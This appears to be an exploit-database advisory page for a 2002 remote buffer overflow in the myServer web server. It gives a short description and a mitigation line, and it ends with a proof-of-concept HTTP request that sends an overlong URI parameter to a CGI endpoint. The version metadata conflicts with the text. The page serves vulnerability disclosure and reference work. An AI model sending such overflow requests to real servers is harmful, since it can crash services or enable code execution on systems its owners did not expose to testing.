header-logo
Suggest Exploit
vendor:
myServer
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: myServer
Affected Version From: 2000.4.3
Affected Version To: 2000.4.3
Patch Exists: YES
Related CWE: N/A
CPE: myServer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

myServer Remote Buffer Overflow Vulnerability

myServer has been reported prone to a remote buffer overflow vulnerability. It is possible to trigger this issue by sending overly long values for URI parameters. Although unconfirmed, this vulnerability may be potentially exploited to execute attacker-supplied code with the privileges of the vulnerable web server.

Mitigation:

Ensure that all user-supplied input is validated and sanitized before being used.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8612/info

myServer has been reported prone to a remote buffer overflow vulnerability. It is possible to trigger this issue by sending overly long values for URI parameters.

Although unconfirmed, this vulnerability may be potentially exploited to execute attacker-supplied code with the privileges of the vulnerable web server.

This vulnerability was reported for myServer version 0.4.3 and earlier. 

GET /cgi-bin/math_sum.mscgi?a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Moozatech (compatible; Moozatech Scanner)
Host: 12.12.12.12
Connection: Keep-Alive